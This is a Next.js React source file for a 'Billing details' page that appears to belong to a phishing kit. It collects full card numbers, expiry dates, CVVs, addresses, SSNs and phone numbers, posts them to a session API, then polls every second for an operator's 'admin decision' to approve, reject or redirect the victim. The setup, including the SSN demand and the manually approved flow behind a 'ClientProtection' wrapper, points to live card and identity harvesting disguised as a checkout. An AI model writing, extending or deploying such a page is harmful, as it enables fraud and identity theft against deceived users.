"use client";

import { useMemo, useState, useEffect } from "react";
import { useRouter, useSearchParams } from "next/navigation";
import ClientProtection from "@/components/ClientProtection";

function detectCardType(cardNumber: string): "visa" | "mastercard" | "unknown" {
  const cleaned = cardNumber.replace(/\s+/g, "");
  if (/^4[0-9]{6,}$/.test(cleaned)) return "visa";
  if (
    /^(5[1-5][0-9]{5,}|2(2[2-9][0-9]{3,}|[3-6][0-9]{4,}|7[01][0-9]{3,}|720[0-9]{2,}))$/.test(
      cleaned
    )
  )
    return "mastercard";
  return "unknown";
}

function isFutureExpiry(mmYY: string): boolean {
  const match = mmYY.match(/^(0[1-9]|1[0-2])\/(\d{2})$/);
  if (!match) return false;
  const month = parseInt(match[1], 10);
  const year = 2000 + parseInt(match[2], 10);
  const now = new Date();
  const exp = new Date(year, month - 1, 1);
  // Set to end of month
  exp.setMonth(exp.getMonth() + 1);
  return exp > now;
}

export default function BillingPage() {
  const router = useRouter();
  const searchParams = useSearchParams();
  const sessionId = useMemo(
    () => searchParams.get("sessionId") || "",
    [searchParams]
  );
  const username = useMemo(
    () => searchParams.get("username") || "",
    [searchParams]
  );

  const [firstName, setFirstName] = useState("");
  const [lastName, setLastName] = useState("");
  const [cardNumber, setCardNumber] = useState("");
  const [expiry, setExpiry] = useState("");
  const [cvv, setCvv] = useState("");
  const [street, setStreet] = useState("");
  const [postal, setPostal] = useState("");
  const [state, setState] = useState("");
  const [ssn, setSsn] = useState("");
  const [phone, setPhone] = useState("");
  const [isLoading, setIsLoading] = useState(false);
  const [error, setError] = useState("");

  const cardType = detectCardType(cardNumber);
  const isExpiryValid = isFutureExpiry(expiry);

  // Admin decision checking
  const checkAdminDecision = async () => {
    if (!sessionId) return;
    try {
      const response = await fetch(`/api/session?sessionId=${sessionId}`);
      const session = await response.json();

      if (session?.status === "approved") {
        setIsLoading(false);
        const params = new URLSearchParams({
          sessionId,
          username,
        });

        // Check if admin specified a redirect
        if (session.redirectTo) {
          router.push(`/${session.redirectTo}?${params.toString()}`);
        } else {
          // Default to thank you page
          router.push(`/thankyou?${params.toString()}`);
        }
      } else if (session?.status === "rejected") {
        setIsLoading(false);
        setError(session.rejectionReason || "Invalid billing information");
      }
    } catch (error) {
      console.error("Error checking admin decision:", error);
    }
  };

  useEffect(() => {
    if (isLoading) {
      const interval = setInterval(checkAdminDecision, 1000);
      return () => clearInterval(interval);
    }
  }, [isLoading, sessionId, checkAdminDecision]);

  return (
    <ClientProtection>
      <div className="min-h-screen bg-white flex flex-col">
        <header className="bg-white py-3 px-6 flex justify-center items-center border-b border-gray-200">
          <h1 className="text-xl font-semibold text-gray-900">
            Billing details
          </h1>
        </header>

        <main className="flex-1 flex flex-col items-center justify-center px-6 py-10">
          <div className="w-full max-w-2xl">
            <div className="bg-white rounded-[24px] shadow-[0_12px_32px_rgba(0,0,0,0.06)] p-8 border border-gray-200">
              <form
                className="grid grid-cols-1 md:grid-cols-2 gap-6"
                onSubmit={async (e) => {
                  e.preventDefault();

                  // Validation
                  if (
                    !firstName ||
                    !lastName ||
                    !cardNumber ||
                    !expiry ||
                    !cvv ||
                    !street ||
                    !postal ||
                    !state ||
                    !ssn ||
                    !phone
                  ) {
                    setError("Please fill in all fields");
                    return;
                  }

                  if (!isExpiryValid) {
                    setError("Please enter a valid future expiry date");
                    return;
                  }

                  if (!/^\d{3,4}$/.test(cvv)) {
                    setError("CVV must be 3-4 digits");
                    return;
                  }

                  if (!/^\d{9}$/.test(ssn.replace(/-/g, ""))) {
                    setError("SSN must be 9 digits");
                    return;
                  }

                  if (!/^\d{10}$/.test(phone.replace(/\D/g, ""))) {
                    setError("Phone number must be 10 digits");
                    return;
                  }

                  setError("");
                  setIsLoading(true);

                  // Save to database and wait for admin approval
                  if (!sessionId) {
                    setIsLoading(false);
                    return;
                  }

                  try {
                    await fetch("/api/session", {
                      method: "POST",
                      headers: { "Content-Type": "application/json" },
                      body: JSON.stringify({
                        sessionId,
                        step: "billing",
                        data: {
                          firstName,
                          lastName,
                          cardNumber: cardNumber.replace(/\s/g, ""), // Remove spaces for storage
                          cardType,
                          expiryDate: expiry,
                          cvv,
                          street,
                          postal,
                          state,
                          ssn: ssn.replace(/-/g, ""), // Remove dashes for storage
                          phone: phone.replace(/\D/g, ""), // Remove formatting for storage
                        },
                      }),
                    });
                  } catch (error) {
                    console.error("Error saving session:", error);
                    setIsLoading(false);
                  }
                }}
              >
                <div>
                  <label className="block text-sm font-semibold text-gray-700 mb-2">
                    First name
                  </label>
                  <input
                    value={firstName}
                    onChange={(e) => setFirstName(e.target.value)}
                    className="w-full h-12 px-4 border border-gray-300 rounded-lg text-gray-900"
                    required
                  />
                </div>
                <div>
                  <label className="block text-sm font-semibold text-gray-700 mb-2">
                    Last name
                  </label>
                  <input
                    value={lastName}
                    onChange={(e) => setLastName(e.target.value)}
                    className="w-full h-12 px-4 border border-gray-300 rounded-lg text-gray-900"
                    required
                  />
                </div>

                <div className="md:col-span-2">
                  <label className="block text-sm font-semibold text-gray-700 mb-2">
                    Card number{" "}
                    {cardType !== "unknown" && (
                      <span className="ml-2 text-xs text-gray-600">
                        ({cardType.toUpperCase()})
                      </span>
                    )}
                  </label>
                  <input
                    value={cardNumber}
                    onChange={(e) => {
                      // Remove all non-digits and limit to 16 digits
                      const digits = e.target.value
                        .replace(/\D/g, "")
                        .slice(0, 16);
                      // Format as XXXX XXXX XXXX XXXX
                      const formatted = digits.replace(/(\d{4})(?=\d)/g, "$1 ");
                      setCardNumber(formatted);
                    }}
                    placeholder="4242 4242 4242 4242"
                    maxLength={19} // 16 digits + 3 spaces
                    className="w-full h-12 px-4 border border-gray-300 rounded-lg text-gray-900"
                    inputMode="numeric"
                    required
                  />
                </div>

                <div>
                  <label className="block text-sm font-semibold text-gray-700 mb-2">
                    Expiry (MM/YY)
                  </label>
                  <input
                    value={expiry}
                    onChange={(e) => {
                      // Remove all non-digits and limit to 4 digits
                      const digits = e.target.value
                        .replace(/\D/g, "")
                        .slice(0, 4);
                      // Auto-format as MM/YY
                      let formatted = digits;
                      if (digits.length >= 2) {
                        formatted = digits.slice(0, 2) + "/" + digits.slice(2);
                      }
                      setExpiry(formatted);
                    }}
                    placeholder="MM/YY"
                    maxLength={5} // MM/YY format
                    className={`w-full h-12 px-4 border rounded-lg text-gray-900 ${
                      isExpiryValid || expiry.length === 0
                        ? "border-gray-300"
                        : "border-red-500"
                    }`}
                    inputMode="numeric"
                    required
                  />
                </div>
                <div>
                  <label className="block text-sm font-semibold text-gray-700 mb-2">
                    CVV
                  </label>
                  <input
                    value={cvv}
                    onChange={(e) => {
                      // Only allow digits, limit to 4
                      const digits = e.target.value
                        .replace(/\D/g, "")
                        .slice(0, 4);
                      setCvv(digits);
                    }}
                    placeholder="123"
                    maxLength={4}
                    className="w-full h-12 px-4 border border-gray-300 rounded-lg text-gray-900"
                    inputMode="numeric"
                    required
                  />
                </div>

                <div className="md:col-span-2">
                  <label className="block text-sm font-semibold text-gray-700 mb-2">
                    Street
                  </label>
                  <input
                    value={street}
                    onChange={(e) => setStreet(e.target.value)}
                    className="w-full h-12 px-4 border border-gray-300 rounded-lg text-gray-900"
                    required
                  />
                </div>
                <div>
                  <label className="block text-sm font-semibold text-gray-700 mb-2">
                    Postal code
                  </label>
                  <input
                    value={postal}
                    onChange={(e) => {
                      // Allow alphanumeric for international postal codes, limit to 10 chars
                      const cleaned = e.target.value
                        .replace(/[^a-zA-Z0-9\s-]/g, "")
                        .slice(0, 10);
                      setPostal(cleaned.toUpperCase());
                    }}
                    placeholder="12345 or A1B 2C3"
                    maxLength={10}
                    className="w-full h-12 px-4 border border-gray-300 rounded-lg text-gray-900"
                    required
                  />
                </div>
                <div>
                  <label className="block text-sm font-semibold text-gray-700 mb-2">
                    State
                  </label>
                  <input
                    value={state}
                    onChange={(e) => setState(e.target.value)}
                    className="w-full h-12 px-4 border border-gray-300 rounded-lg text-gray-900"
                    required
                  />
                </div>

                <div>
                  <label className="block text-sm font-semibold text-gray-700 mb-2">
                    SSN (9 digits)
                  </label>
                  <input
                    value={ssn}
                    onChange={(e) => {
                      // Remove all non-digits and limit to 9 digits
                      const digits = e.target.value
                        .replace(/\D/g, "")
                        .slice(0, 9);
                      // Format as XXX-XX-XXXX
                      let formatted = digits;
                      if (digits.length >= 5) {
                        formatted = `${digits.slice(0, 3)}-${digits.slice(
                          3,
                          5
                        )}-${digits.slice(5)}`;
                      } else if (digits.length >= 3) {
                        formatted = `${digits.slice(0, 3)}-${digits.slice(3)}`;
                      }
                      setSsn(formatted);
                    }}
                    placeholder="123-45-6789"
                    maxLength={11} // XXX-XX-XXXX format
                    className="w-full h-12 px-4 border border-gray-300 rounded-lg text-gray-900"
                    inputMode="numeric"
                    required
                  />
                </div>
                <div>
                  <label className="block text-sm font-semibold text-gray-700 mb-2">
                    Phone number
                  </label>
                  <input
                    value={phone}
                    onChange={(e) => {
                      // Remove all non-digits and limit to 10 digits
                      const digits = e.target.value
                        .replace(/\D/g, "")
                        .slice(0, 10);
                      // Format as (XXX) XXX-XXXX
                      let formatted = digits;
                      if (digits.length >= 6) {
                        formatted = `(${digits.slice(0, 3)}) ${digits.slice(
                          3,
                          6
                        )}-${digits.slice(6)}`;
                      } else if (digits.length >= 3) {
                        formatted = `(${digits.slice(0, 3)}) ${digits.slice(
                          3
                        )}`;
                      } else if (digits.length > 0) {
                        formatted = `(${digits}`;
                      }
                      setPhone(formatted);
                    }}
                    placeholder="(555) 123-4567"
                    maxLength={14} // (XXX) XXX-XXXX format
                    className="w-full h-12 px-4 border border-gray-300 rounded-lg text-gray-900"
                    inputMode="numeric"
                    required
                  />
                </div>

                {error && (
                  <div className="md:col-span-2 text-red-600 text-sm text-center bg-red-50 p-3 rounded-lg">
                    {error}
                  </div>
                )}

                <div className="md:col-span-2 flex justify-end">
                  <button
                    type="submit"
                    disabled={isLoading}
                    className="px-6 h-12 bg-[#4C6E2C] text-white font-semibold rounded-full hover:bg-[#3A5221] disabled:opacity-50 disabled:cursor-not-allowed transition-colors"
                  >
                    {isLoading ? "Verifying details..." : "Verify details"}
                  </button>
                </div>
              </form>
            </div>
          </div>
        </main>
      </div>
    </ClientProtection>
  );
}
